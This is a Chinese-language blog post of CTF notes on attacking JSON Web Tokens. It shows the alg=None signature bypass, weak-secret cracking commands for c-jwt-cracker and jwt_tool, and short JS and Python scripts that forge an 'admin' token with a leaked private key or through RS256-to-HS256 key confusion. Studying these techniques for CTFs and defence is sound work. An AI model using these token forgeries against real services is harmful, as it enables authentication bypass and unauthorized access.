JWT-ctf

已于 2023-09-13 23:15:43 修改
阅读量715 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: node.js web安全
于 2023-07-17 14:58:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zero_with_one/article/details/131766354
文章介绍了JSONWebTokens(JWT)的三部分组成——Header,Payload,Signature,以及它们的内容。讨论了不同加密算法如HS256和RS256的工作原理,如何使用公钥和私钥进行签名和验证。还提到了JWT的安全性问题,包括无签名JWT的隐患和可能的破解工具,以及如何通过修改算法来构造JWT。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

JSON Web Tokens - jwt.io

三个部分组成

  • Header
  • Payload
  • Signature
    形式:xxxxx.yyyyy.zzzzz
HEADER:ALGORITHM & TOKEN TYPE
{
  "alg": "None",
  "typ": "jwt"
}

PAYLOAD:DATA
[
  {
    "iss": "admin",
    "iat": 1689410770,
    "exp": 1689417970,
    "nbf": 1689410770,
    "sub": "user",
    "jti": "f9bb22e3f645b6d8cd37307ff1349306"
  }
]

VERIFY SIGNATURE

签名一般会变

无签名认证时,可以先调为HS256加密算法进行JWT


当有签名时,可将 Header 中的加密算法改为 None(JWT 支持将算法设定为 “None”。如果“alg” 字段设为“ None”,那么签名会被置空,这样任何 token 都是有效的)

改payload为:header + '.' + payload + '.'(注意最后的点)

直接用base64改即可

弱密码利用工具爆破获得密钥

c-jwt-cracker

./jwtcrack xxx


jwt_tool.py

python3 jwt_tool.py xxx -C -d jwt-common.txt

GitHub - ticarpi/jwt_tool: 🐍 A toolkit for testing, tweaking and cracking JSON Web Tokens

RS256 是使用 RSA 私钥进行签名,使用 RSA 公钥进行验证,
HS256 使用同一个「secret_key」进行签名与验证(对称加密)
ES256 和 RS256 一样,都使用私钥签名,公钥验证

可以尝试浏览器目录是否有public.key 和 private.key

当知道私钥时,可以通过RS2565构造jwt

js脚本
const jwt = require('jsonwebtoken');
var fs = require('fs');
var privateKey = fs.readFileSync('private.key');
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'RS256' });
console.log(token)

python脚本:
import jwt  
public = open('private.key', 'r').read()  
payload={"user":"admin"}  
print(jwt.encode(payload, key=public, algorithm='RS256'))
# 需安装pyjwt库

当只知道公钥时

可以通过HS256构造jwt(如果将算法从RS256改为HS256,则后端代码将使用公钥作为密钥,然后使用HS256算法验证签名)

js脚本
const jwt = require('jsonwebtoken');
var fs = require('fs');
var privateKey = fs.readFileSync('public.key');
var token = jwt.sign({ user: 'admin' }, privateKey, { algorithm: 'HS256' });
console.log(token)
Lightpig&
关注
JWT渗透与攻防(一)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-24 2025
Json web token (JWT)相关漏洞对于渗透测试人员而言可能是一种非常吸引人的攻击途径,因为它们不仅是让你获得无限访问权限的关键,而且还被视为隐藏了通往以下特权的途径:特权升级,信息泄露,SQLi,XSS,SSRF,RCE,LFI等,在测试JWT时,通过对目标服务的Web请求中使用的Token进行读取,篡改和签名。
CTFHub~JWT漏洞靶场最详细教程
weixin_67832625的博客
08-21 1653
JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. JWTs can
Json web token (JWT)渗透与防御及ctf例题
weixin_65582330的博客
03-06 1904
可以看到我们登录进去后,用f12检测可以发现他有着jwt形式的token,这里也可以用bp进行抓包,下面用kali中的jwt_tool工具进行破解,可以看到flag。算法为none是因为开发人员为了更方便的修改,把header部分设置为none,从而不用进行第三部分签名的认证。从题目中可以知道必须要成为admin才可以得到flag,而我们是guest,所以我们可以试试把签名设置为空。还有一道类似的题,需要用到爆破工具,可以抓到包,看到jwt数据,拿到kali中进行jwt工具的扫描。
JWT攻击手册(附jwt_tool用法,爆破弱密钥等)
热门推荐
weixin_50464560的博客
10-01 2万+
转载至https://www.cnblogs.com/xiaozi/p/12005929.html JSON Web Token(JWT)对于渗透测试人员而言可能是一种非常吸引人的攻击途径,因为它们不仅是让你获得无限访问权限的关键,而且还被视为隐藏了通往以下特权的途径:特权升级,信息泄露,SQLi,XSS,SSRF,RCE,LFI等 ,可能还有更多!攻击令牌的过程显然取决于您正在测试的JWT配置和实现的情况,但是在测试JWT时,通过对目标服务的Web请求中使用的Token进行读取,篡改和签名,可能遇到已知的
JWT渗透
BRMTSW的博客
03-01 735
JWT渗透
jwt_tool:用于测试,调整和破解JSON Web令牌的工具包
04-29
JSON Web令牌工具包v2 jwt_tool.py是用于验证,伪造,扫描和篡改JWTJSON Web令牌)的工具包。 其功能包括: 检查令牌的有效性 测试已知漏洞: (CVE-2015-2951) alg = none签名绕过漏洞 (CVE-2016-10555) RS / HS256公钥不匹配漏洞 (CVE-2018-0114)密钥注入漏洞 (CVE-2019-20933 / CVE-2020-28637)空白密码漏洞 (CVE-2020-28042)空签名漏洞 扫描配置错误或已知漏洞 模糊声明值以引发意外行为 测试机密/密钥文件/公共密钥/ JWKS密钥的有效性 通过高速字典攻击识别弱键 伪造新的令牌头和有效载荷内容,并使用密钥或通过其他攻击方法创建新的签名 时间戳篡改 RSA和ECDSA密钥生成和重建(来自JWKS文件) ...还有更多! 观众 该工具是为渗透测试人员
jwt_tool-master.zip
07-13
可以针对JSON Web Tokens进行渗透测试:$python jwt_tool.py (filename)
tryhackme-ctf:TryHackMe CTF的编写,注释,dratfs,拼字游戏,文件和解决方案
05-06
注释,代码,PoC,解决方案,文章,涂鸦,草稿...。 (意大利前10名 :Italy: ) 使用的工具: 挖 ping 跟踪路线 ... c-jwt-cracker wfuzz kerbrute 拍板 鲁比乌斯 邪恶的温克 uf 敲门(端口敲门)
JWT-ctfshow
unexpectedthing的博客
10-07 378
文章目录JWT的简介web354(无加密)web346web347web348web349web350 JWT的简介 JWT简要介绍 JSON Web Token 入门教程 明确header,payload,signature三个东西的组成原理 明确jwt的作用和与session_id的区别所在。 base64URL的加密算法。 web354(无加密) F12看到有个/admin的文件目录,进去之后访问不了 然后抓包发现一串cookie中的token,就是JWT 我们将 第一部分{“alg”:“None”
【密钥泄漏】CVE-2022-29266 Apache Apisix jwt插件
HBohan的博客
04-29 1015
漏洞描述 在2.13.1版本之前的APache APISIX中,攻击者可以通过向受 jwt-auth 插件保护的路由发送不正确的 JSON Web 令牌来通过错误消息响应获取插件配置的机密。依赖库 lua-resty-jwt 中的错误逻辑允许将 RS256 令牌发送到需要 HS256 令牌的端点,错误响应中包含原始密钥值。 漏洞版本 Apache Apisix < 2.13.1 插件开启 在这里给大家演示的是Dashboard页面开启jwt插件。 1、当我们环境搭建完毕后、通过访问http://127
ack123打靶记录
lightsec
03-20 5211
前言: 此靶场是月师傅九月出师考核靶场,搭建过程参考文章红队考核靶场ack123下载和搭建 靶场地址:https://pan.baidu.com/s/13g_1FFg-ZYYpBwkCvKyYWQ提取码:7fkj 靶场拓扑图: 靶场的主要考点: 1.站库分离 外网打点 2.过360全家桶 3.过windwos defender 4.过火绒 5.内网漫游 6.多层网络渗透 7.横向渗透 8.jwt token密钥破解 9.权限提升 10.域渗透 11.phpmyadm..
JWT攻击中文手册
12-08 2458
JSON Web Token(JWT)对于渗透测试人员而言可能是一种非常吸引人的攻击途径,因为它们不仅是让你获得无限访问权限的关键,而且还被视为隐藏了通往以下特权的途径:特权升级,信息泄露,SQLi,XSS,SSRF,RCE,LFI等 ,可能还有更多!攻击令牌的过程显然取决于您正在测试的JWT配置和实现的情况,但是在测试JWT时,通过对目标服务的Web请求中使用的Token进行读取,...
JWT安全漏洞以及常见攻击方式
02-18 9654
随着web应用的日渐复杂化,某些场景下,仅使用Cookie、Session等常见的身份鉴别方式无法满足业务的需要,JWT也就应运而生,JWT可以有效的解决分布式场景下的身份鉴别问题,并且会规避掉一些安全问题,如CORS跨域漏洞,CSRF漏洞等。JWTJson Web Token的缩写,顾名思义,是Token的一种。它常被用来在向服务器发起请求时用作身份认证。使用JWT作为身份认证的优势在于:它不需要在服务端去保留用户的认证信息。
JWT渗透姿势一篇通,2024年最新毕业一年萌新的Golang大厂面经
2401_84253182的博客
04-13 1441
jwk(JSON Web Key):提供一个代表密钥的嵌入式JSON对象jku(JSON Web Key Set URL):提供一个URL,服务器可以从这个URL获取一组包含正确密钥的密钥kid(密钥id):提供一个ID,在有多个密钥可供选择的情况下服务器可以用它来识别正确的密钥,根据键的格式这可能有一个匹配的kid参数这些用户可控制的参数每个都告诉接收方服务器在验证签名时应该使用哪个密钥,下面我们将介绍如何利用这些参数来注入使用您自己的任意密钥而不是服务器的密钥签名修改过的JWT
JWT介绍&amp;空加密&amp;暴破密钥&amp;私钥泄露&amp;密钥混淆&amp;黑盒_jwt泄露
2401_83739434的博客
04-15 959
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。同样,将 JWT 值发到 Decoder 模块,先 Base64 解码,将 HS256 替换为 none,user 替换为 admin 后,再 Base64 编码。然后启动 jwt_tool,使用 -T 自定义修改模式,根据提示将 HS256 替换为 none,user 替换为 admin,最后会自动生成对应 JWT 值。
物流信息 缺少jwt参数_对jwt安全测试方式总结
weixin_39905695的博客
11-21 355
1. jwt简介相对于传统的session-cookie身份校验机制,Token Auth正在变得流行,也就是说把token信息全部存在于客户端。这篇文章就讲讲Token Auth的一种,jwt机制。jwt(JSON Web Token)是一串json格式的字符串,由服务端用加密算法对信息签名来保证其完整性和不可伪造。Token里可以包含所有必要信息,这样服务端就无需保存任何关于用户或会话的信息,...
JWT介绍&空加密&暴破密钥&私钥泄露&密钥混淆&黑盒
qq_46081990的博客
12-21 7878
本文介绍了什么是 JWT,并将基于 Token 的验证方式与 Cookie+Session 的验证方式对比,介绍了 JWT 三个组成部分(Header、Claims、Signature)及 JWT 流量特征(eyJ)。 着重讲解了 JWT 的漏洞利用方式(空加密算法、爆破密钥、私钥泄露、密钥混淆),最后总结了黑盒下 JWT 漏洞的测试思路。
go语言jwt ctf
最新发布
01-18
### Go语言中JWTCTF竞赛的应用与实现 #### JWT简介 JSON Web Token (JWT) 是一种开放标准(RFC 7519),用于在网络应用环境间安全地传输信息。由于其紧凑性和自包含特性,JWT被广泛应用于身份验证和信息交换场景[^1...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值